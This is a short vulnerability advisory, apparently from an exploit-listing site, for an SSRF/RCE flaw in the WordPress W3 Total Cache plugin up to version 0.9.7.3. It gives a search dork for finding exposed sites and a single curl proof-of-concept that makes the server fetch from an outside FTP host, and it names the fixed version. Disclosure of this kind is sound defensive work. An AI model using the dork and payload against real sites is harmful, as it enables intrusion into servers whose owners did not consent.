Wordpress - W3 Total Cache - SSRF / RCE

2019.05.08

kill_the_net (DZ)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:'/wp-content/plugins/w3-total-cache/readme.txt'

|================================================================================|
[+] Title : Wordpress - W3 Total Cache - SSRF / RCE
[+] Version : W3 Total Cache <= 0.9.7.3
[+] Download link : https://fr.wordpress.org/plugins/w3-total-cache/
[+] Date : 2019-05-06
[+] Description:

The implementation of `opcache_flush_file` calls `file_exists` with a parameter fully controlled by the user.

[+] Proof of Concept:

curl 'http://x.x.x.x/wp-content/plugins/w3-total-cache/pub/opcache.php' --data 'nonce=974ca6ad15021a6668e7ae02e1be551c&command=flush_file&file=ftp://y.y.y.y:zzzz/'

[+] FIXED in : version 0.9.7.4

|================================================================================|

References:

https://plugins.trac.wordpress.org/changeset/2081515/w3-total-cache#file24

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Wordpress - W3 Total Cache - SSRF / RCE

Dork: inurl:'/wp-content/plugins/w3-total-cache/readme.txt'

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.